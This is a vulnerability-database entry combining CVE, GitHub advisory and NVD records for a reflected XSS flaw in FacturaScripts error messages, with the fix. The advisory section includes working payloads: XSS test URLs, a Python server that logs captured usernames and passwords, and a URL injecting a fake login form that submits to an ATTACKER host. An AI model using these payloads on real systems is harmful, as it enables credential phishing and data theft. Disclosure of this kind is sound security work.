CVE-2026-23476 (GCVE-0-2026-23476)
Vulnerability from cvelistv5 – Published: 2026-02-02 20:49 – Updated: 2026-02-03 15:33
VLAI?
Title
FacturaScripts Affected by Reflected XSS
Summary
FacturaScripts is open-source enterprise resource planning and accounting software. Prior to 2025.8, there a reflected XSS bug in FacturaScripts. The problem is in how error messages get displayed. Twig's | raw filter is used, which skips HTML escaping. When triggering a database error (like passing a string where an integer is expected), the error message includes the input and gets rendered without sanitization. This vulnerability is fixed in 2025.8.
Severity ?
5.4 (Medium)
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| NeoRazorX | facturascripts |
Affected:
< 2025.8
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-23476",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-02-03T15:33:36.983717Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-02-03T15:33:51.348Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "facturascripts",
"vendor": "NeoRazorX",
"versions": [
{
"status": "affected",
"version": "\u003c 2025.8"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "FacturaScripts is open-source enterprise resource planning and accounting software. Prior to 2025.8, there a reflected XSS bug in FacturaScripts. The problem is in how error messages get displayed. Twig\u0027s | raw filter is used, which skips HTML escaping. When triggering a database error (like passing a string where an integer is expected), the error message includes the input and gets rendered without sanitization. This vulnerability is fixed in 2025.8."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-02-02T20:49:05.731Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-g6w2-q45f-xrp4",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-g6w2-q45f-xrp4"
},
{
"name": "https://github.com/NeoRazorX/facturascripts/commit/2afd98cecd26c5f8357e0e321d86063ad1012fc3",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/NeoRazorX/facturascripts/commit/2afd98cecd26c5f8357e0e321d86063ad1012fc3"
},
{
"name": "https://github.com/NeoRazorX/facturascripts/releases/tag/v2025.8",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/NeoRazorX/facturascripts/releases/tag/v2025.8"
}
],
"source": {
"advisory": "GHSA-g6w2-q45f-xrp4",
"discovery": "UNKNOWN"
},
"title": "FacturaScripts Affected by Reflected XSS"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-23476",
"datePublished": "2026-02-02T20:49:05.731Z",
"dateReserved": "2026-01-13T15:47:41.626Z",
"dateUpdated": "2026-02-03T15:33:51.348Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2026-23476\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-02-02T23:16:07.030\",\"lastModified\":\"2026-02-23T15:32:54.620\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"FacturaScripts is open-source enterprise resource planning and accounting software. Prior to 2025.8, there a reflected XSS bug in FacturaScripts. The problem is in how error messages get displayed. Twig\u0027s | raw filter is used, which skips HTML escaping. When triggering a database error (like passing a string where an integer is expected), the error message includes the input and gets rendered without sanitization. This vulnerability is fixed in 2025.8.\"},{\"lang\":\"es\",\"value\":\"FacturaScripts es un software de planificaci\u00f3n de recursos empresariales y contabilidad de c\u00f3digo abierto. Antes de la versi\u00f3n 2025.8, exist\u00eda un fallo de XSS reflejado en FacturaScripts. El problema radica en c\u00f3mo se muestran los mensajes de error. Se utiliza el filtro |raw de Twig, lo que omite el escape de HTML. Al activar un error de base de datos (como pasar una cadena donde se espera un n\u00famero entero), el mensaje de error incluye la entrada y se renderiza sin sanitizaci\u00f3n. Esta vulnerabilidad se ha corregido en la versi\u00f3n 2025.8.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\",\"baseScore\":5.4,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.3,\"impactScore\":2.7}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:facturascripts:facturascripts:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2025.8\",\"matchCriteriaId\":\"258F0619-F363-4A25-9BA2-18D2FA4C8576\"}]}]}],\"references\":[{\"url\":\"https://github.com/NeoRazorX/facturascripts/commit/2afd98cecd26c5f8357e0e321d86063ad1012fc3\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/NeoRazorX/facturascripts/releases/tag/v2025.8\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-g6w2-q45f-xrp4\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\",\"Mitigation\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-23476\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-02-03T15:33:36.983717Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-02-03T15:33:47.336Z\"}}], \"cna\": {\"title\": \"FacturaScripts Affected by Reflected XSS\", \"source\": {\"advisory\": \"GHSA-g6w2-q45f-xrp4\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 5.4, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"NeoRazorX\", \"product\": \"facturascripts\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2025.8\"}]}], \"references\": [{\"url\": \"https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-g6w2-q45f-xrp4\", \"name\": \"https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-g6w2-q45f-xrp4\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/NeoRazorX/facturascripts/commit/2afd98cecd26c5f8357e0e321d86063ad1012fc3\", \"name\": \"https://github.com/NeoRazorX/facturascripts/commit/2afd98cecd26c5f8357e0e321d86063ad1012fc3\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/NeoRazorX/facturascripts/releases/tag/v2025.8\", \"name\": \"https://github.com/NeoRazorX/facturascripts/releases/tag/v2025.8\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"FacturaScripts is open-source enterprise resource planning and accounting software. Prior to 2025.8, there a reflected XSS bug in FacturaScripts. The problem is in how error messages get displayed. Twig\u0027s | raw filter is used, which skips HTML escaping. When triggering a database error (like passing a string where an integer is expected), the error message includes the input and gets rendered without sanitization. This vulnerability is fixed in 2025.8.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-79\", \"description\": \"CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-02-02T20:49:05.731Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-23476\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-02-03T15:33:51.348Z\", \"dateReserved\": \"2026-01-13T15:47:41.626Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-02-02T20:49:05.731Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
GHSA-G6W2-Q45F-XRP4
Vulnerability from github – Published: 2026-02-02 18:00 – Updated: 2026-02-03 16:09
VLAI?
Summary
FacturaScripts is Vulnerable to Reflected XSS
Details
Reflected XSS via SQL Error Messages
Summary
A reflected XSS bug has been found in FacturaScripts. The problem is in how error messages get displayed - it's using Twig's | raw filter which skips HTML escaping. When a database error is triggered (like passing a string where an integer is expected), the error message includes all input and gets rendered without sanitization.
Attackers can use this to phish credentials from other users since HttpOnly is set on cookies (so stealing cookies directly won't work, but attackers can inject a fake login form).
CVSS 6.1 (Medium-High)
What was Found
Where the bug exists in the code:
Core/View/Macro/Utils.html.twig, line 27:
{% for item in messages %}
<div>{{ item.message | raw }}</div>
{% endfor %}
That | raw is the problem. It tells Twig not to escape anything.
How it works
So here's what happens:
- Hhit
/EditProducto?code=<svg onload=alert(1)> or <img src=x onerror=alert(1)> - The app tries to look up a product with that "code"
- PostgreSQL throws an error because
<svg onload=alert(1)>isn't a valid integer - The error goes something like:
ERROR: invalid input syntax for type integer: "<svg onload=alert(1)>" LINE 1: SELECT * FROM "productos" WHERE "idproducto" = '<img src=x onerror=alert(1)>" - This gets logged via MiniLog and displayed to the user
- Because of
| raw, the browser actually executes the JS
The error logging happens in Core/Base/DataBase.php around line 236:
self::$miniLog->error(self::$engine->errorMessage(self::$link), ['sql' => $sql]);
And PostgreSQL's error message includes whatever garbage it was sent.
Reproduction Steps
Requirements
- Working FacturaScripts install
- Any user account (doesn't need to be admin)
- The victim needs to be logged in
Quick test
Just visit this URL while logged in:
http://localhost/EditProducto?code=<svg onload=alert(document.domain)>
An alert box should pop up.
For a real attack (credential phishing)
Set up a simple server to catch credentials:
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import urlparse, parse_qs
class Handler(BaseHTTPRequestHandler):
def do_GET(self):
q = parse_qs(urlparse(self.path).query)
print(f"\nGot creds:")
print(f" User: {q.get('user', ['?'])[0]}")
print(f" Pass: {q.get('pass', ['?'])[0]}")
self.send_response(200)
self.end_headers()
def log_message(self, *args): pass
HTTPServer(('', 8888), Handler).serve_forever()
Then craft a URL that injects a fake login form:
http://TARGET/EditProducto?code=<svg onload="document.body.innerHTML='<div style=text-align:center;padding:100px><h2>Session Expired</h2><form action=http://ATTACKER:8888/steal><input name=user placeholder=Username><br><input name=pass type=password placeholder=Password><br><button>Login</button></form></div>'">
Send that to someone (email, chat, whatever). When they click it and enter their password thinking their session expired, their creds are displayed.
Other endpoints that work
Pretty much anything that uses the code parameter:
- /EditProducto?code=
- /EditCliente?code=
- /EditFacturaCliente?code=
- /EditProveedor?code=
- etc.
Basically all the Edit controllers.
Impact
What attackers can do with this
Steal credentials - Can't grab cookies directly (HttpOnly), but the phishing form trick works great. Victim thinks their session timed out and re-enters their password.
Read page data - Once JS is running, attackers can scrape whatever's on the page (invoices, customer info, financial data) and send it somewhere.
Keylog - Inject a keylogger that captures everything they type.
Bypass CSRF - Grab the multireqtoken from the page and make requests as the victim.
What attackers CAN'T do
Can't steal session cookies via document.cookie - they're HttpOnly.
Business side
This is a financial app, so if attackers compromise an admin account, the following is possible to create or expose:
- Fake invoices
- Redirected payments
- Customer data breach (GDPR stuff)
- The usual mess
Fix
Quick fix
Just remove | raw from line 27 in Core/View/Macro/Utils.html.twig:
- <div>{{ item.message | raw }}</div>
+ <div>{{ item.message }}</div>
That's it. Twig escapes by default, so removing | raw fixes the XSS.
If projects want to be thorough
- Sanitize messages before they go into the log:
$message = htmlspecialchars($message, ENT_QUOTES, 'UTF-8');
-
Add CSP headers to block inline scripts as a backup
-
Maybe validate the
codeparameter format before it hits the database
Resources
- https://cwe.mitre.org/data/definitions/79.html
- https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
Found: Dec 31, 2025
Tested on: FacturaScripts 2025.61 (Docker), verified vulnerable in 2025.71 (GitHub latest)
Severity ?
5.4 (Medium)
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "facturascripts/facturascripts"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2025.81"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-23476"
],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-02T18:00:43Z",
"nvd_published_at": "2026-02-02T23:16:07Z",
"severity": "MODERATE"
},
"details": "# Reflected XSS via SQL Error Messages\n\n## Summary\n\nA reflected XSS bug has been found in FacturaScripts. The problem is in how error messages get displayed - it\u0027s using Twig\u0027s `| raw` filter which skips HTML escaping. When a database error is triggered (like passing a string where an integer is expected), the error message includes all input and gets rendered without sanitization.\n\nAttackers can use this to phish credentials from other users since HttpOnly is set on cookies (so stealing cookies directly won\u0027t work, but attackers can inject a fake login form).\n\n**CVSS 6.1 (Medium-High)**\n\n---\n\n## What was Found\n\n### Where the bug exists in the code:\n\n`Core/View/Macro/Utils.html.twig`, line 27:\n\n```twig\n{% for item in messages %}\n \u003cdiv\u003e{{ item.message | raw }}\u003c/div\u003e\n{% endfor %}\n```\n\nThat `| raw` is the problem. It tells Twig not to escape anything.\n\n### How it works\n\nSo here\u0027s what happens:\n\n1. Hhit `/EditProducto?code=\u003csvg onload=alert(1)\u003e or \u003cimg src=x onerror=alert(1)\u003e`\n2. The app tries to look up a product with that \"code\"\n3. PostgreSQL throws an error because `\u003csvg onload=alert(1)\u003e` isn\u0027t a valid integer\n4. The error goes something like: ```\n ERROR: invalid input syntax for type integer: \"\u003csvg onload=alert(1)\u003e\"\n LINE 1: SELECT * FROM \"productos\" WHERE \"idproducto\" = \u0027\u003cimg src=x onerror=alert(1)\u003e\"\n ```\n5. This gets logged via MiniLog and displayed to the user\n6. Because of `| raw`, the browser actually executes the JS\n\nThe error logging happens in `Core/Base/DataBase.php` around line 236:\n\n```php\nself::$miniLog-\u003eerror(self::$engine-\u003eerrorMessage(self::$link), [\u0027sql\u0027 =\u003e $sql]);\n```\n\nAnd PostgreSQL\u0027s error message includes whatever garbage it was sent.\n\n---\n\n## Reproduction Steps\n\n### Requirements\n- Working FacturaScripts install\n- Any user account (doesn\u0027t need to be admin)\n- The victim needs to be logged in\n\n### Quick test\n\nJust visit this URL while logged in:\n```\nhttp://localhost/EditProducto?code=\u003csvg onload=alert(document.domain)\u003e\n```\n\nAn alert box should pop up.\n\n### For a real attack (credential phishing)\n\nSet up a simple server to catch credentials:\n\n```python\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nfrom urllib.parse import urlparse, parse_qs\n\nclass Handler(BaseHTTPRequestHandler):\n def do_GET(self):\n q = parse_qs(urlparse(self.path).query)\n print(f\"\\nGot creds:\")\n print(f\" User: {q.get(\u0027user\u0027, [\u0027?\u0027])[0]}\")\n print(f\" Pass: {q.get(\u0027pass\u0027, [\u0027?\u0027])[0]}\")\n self.send_response(200)\n self.end_headers()\n def log_message(self, *args): pass\n\nHTTPServer((\u0027\u0027, 8888), Handler).serve_forever()\n```\n\nThen craft a URL that injects a fake login form:\n\n```\nhttp://TARGET/EditProducto?code=\u003csvg onload=\"document.body.innerHTML=\u0027\u003cdiv style=text-align:center;padding:100px\u003e\u003ch2\u003eSession Expired\u003c/h2\u003e\u003cform action=http://ATTACKER:8888/steal\u003e\u003cinput name=user placeholder=Username\u003e\u003cbr\u003e\u003cinput name=pass type=password placeholder=Password\u003e\u003cbr\u003e\u003cbutton\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/div\u003e\u0027\"\u003e\n```\n\nSend that to someone (email, chat, whatever). When they click it and enter their password thinking their session expired, their creds are displayed.\n\n### Other endpoints that work\n\nPretty much anything that uses the `code` parameter:\n- `/EditProducto?code=`\n- `/EditCliente?code=`\n- `/EditFacturaCliente?code=`\n- `/EditProveedor?code=`\n- etc.\n\nBasically all the Edit controllers.\n\n---\n\n## Impact\n\n### What attackers can do with this\n\n**Steal credentials** - Can\u0027t grab cookies directly (HttpOnly), but the phishing form trick works great. Victim thinks their session timed out and re-enters their password.\n\n**Read page data** - Once JS is running, attackers can scrape whatever\u0027s on the page (invoices, customer info, financial data) and send it somewhere.\n\n**Keylog** - Inject a keylogger that captures everything they type.\n\n**Bypass CSRF** - Grab the `multireqtoken` from the page and make requests as the victim.\n\n### What attackers CAN\u0027T do\n\nCan\u0027t steal session cookies via `document.cookie` - they\u0027re HttpOnly.\n\n### Business side\n\nThis is a financial app, so if attackers compromise an admin account, the following is possible to create or expose:\n- Fake invoices\n- Redirected payments \n- Customer data breach (GDPR stuff)\n- The usual mess\n\n---\n\n## Fix\n\n### Quick fix\n\nJust remove `| raw` from line 27 in `Core/View/Macro/Utils.html.twig`:\n\n```diff\n- \u003cdiv\u003e{{ item.message | raw }}\u003c/div\u003e\n+ \u003cdiv\u003e{{ item.message }}\u003c/div\u003e\n```\n\nThat\u0027s it. Twig escapes by default, so removing `| raw` fixes the XSS.\n\n### If projects want to be thorough\n\n1. Sanitize messages before they go into the log:\n```php\n$message = htmlspecialchars($message, ENT_QUOTES, \u0027UTF-8\u0027);\n```\n\n2. Add CSP headers to block inline scripts as a backup\n\n3. Maybe validate the `code` parameter format before it hits the database\n\n---\n\n## Resources\n\n- https://cwe.mitre.org/data/definitions/79.html\n- https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html\n\n---\n\n**Found:** Dec 31, 2025 \n**Tested on:** FacturaScripts 2025.61 (Docker), verified vulnerable in 2025.71 (GitHub latest)\n\u003cimg width=\"1917\" height=\"868\" alt=\"1\" src=\"https://github.com/user-attachments/assets/a7d770c8-1d61-499c-83dc-e21be8e61c87\" /\u003e\n\u003cimg width=\"337\" height=\"130\" alt=\"3\" src=\"https://github.com/user-attachments/assets/463067ee-3a73-45ed-af26-c32264d5bf41\" /\u003e\n\u003cimg width=\"1915\" height=\"870\" alt=\"phising\" src=\"https://github.com/user-attachments/assets/6e15a021-dc5f-4708-bdd1-887ecb2d2ffb\" /\u003e\n\u003cimg width=\"1915\" height=\"862\" alt=\"phising2\" src=\"https://github.com/user-attachments/assets/100a63b6-c066-43d5-ab39-6085f51ba282\" /\u003e\n\u003cimg width=\"1918\" height=\"877\" alt=\"sql erroe\" src=\"https://github.com/user-attachments/assets/4c3182ba-380d-44d4-ab34-4b0840ad3e39\" /\u003e\n\u003cimg width=\"1165\" height=\"277\" alt=\"version\" src=\"https://github.com/user-attachments/assets/5f23e4de-cf03-4fcf-a6c5-6ca327c8c43a\" /\u003e",
"id": "GHSA-g6w2-q45f-xrp4",
"modified": "2026-02-03T16:09:58Z",
"published": "2026-02-02T18:00:43Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-g6w2-q45f-xrp4"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23476"
},
{
"type": "WEB",
"url": "https://github.com/NeoRazorX/facturascripts/commit/2afd98cecd26c5f8357e0e321d86063ad1012fc3"
},
{
"type": "PACKAGE",
"url": "https://github.com/NeoRazorX/facturascripts"
},
{
"type": "WEB",
"url": "https://github.com/NeoRazorX/facturascripts/releases/tag/v2025.8"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "FacturaScripts is Vulnerable to Reflected XSS"
}
FKIE_CVE-2026-23476
Vulnerability from fkie_nvd - Published: 2026-02-02 23:16 - Updated: 2026-02-23 15:32
Severity ?
Summary
FacturaScripts is open-source enterprise resource planning and accounting software. Prior to 2025.8, there a reflected XSS bug in FacturaScripts. The problem is in how error messages get displayed. Twig's | raw filter is used, which skips HTML escaping. When triggering a database error (like passing a string where an integer is expected), the error message includes the input and gets rendered without sanitization. This vulnerability is fixed in 2025.8.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| facturascripts | facturascripts | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:facturascripts:facturascripts:*:*:*:*:*:*:*:*",
"matchCriteriaId": "258F0619-F363-4A25-9BA2-18D2FA4C8576",
"versionEndExcluding": "2025.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "FacturaScripts is open-source enterprise resource planning and accounting software. Prior to 2025.8, there a reflected XSS bug in FacturaScripts. The problem is in how error messages get displayed. Twig\u0027s | raw filter is used, which skips HTML escaping. When triggering a database error (like passing a string where an integer is expected), the error message includes the input and gets rendered without sanitization. This vulnerability is fixed in 2025.8."
},
{
"lang": "es",
"value": "FacturaScripts es un software de planificaci\u00f3n de recursos empresariales y contabilidad de c\u00f3digo abierto. Antes de la versi\u00f3n 2025.8, exist\u00eda un fallo de XSS reflejado en FacturaScripts. El problema radica en c\u00f3mo se muestran los mensajes de error. Se utiliza el filtro |raw de Twig, lo que omite el escape de HTML. Al activar un error de base de datos (como pasar una cadena donde se espera un n\u00famero entero), el mensaje de error incluye la entrada y se renderiza sin sanitizaci\u00f3n. Esta vulnerabilidad se ha corregido en la versi\u00f3n 2025.8."
}
],
"id": "CVE-2026-23476",
"lastModified": "2026-02-23T15:32:54.620",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-02-02T23:16:07.030",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/NeoRazorX/facturascripts/commit/2afd98cecd26c5f8357e0e321d86063ad1012fc3"
},
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes"
],
"url": "https://github.com/NeoRazorX/facturascripts/releases/tag/v2025.8"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory",
"Mitigation"
],
"url": "https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-g6w2-q45f-xrp4"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…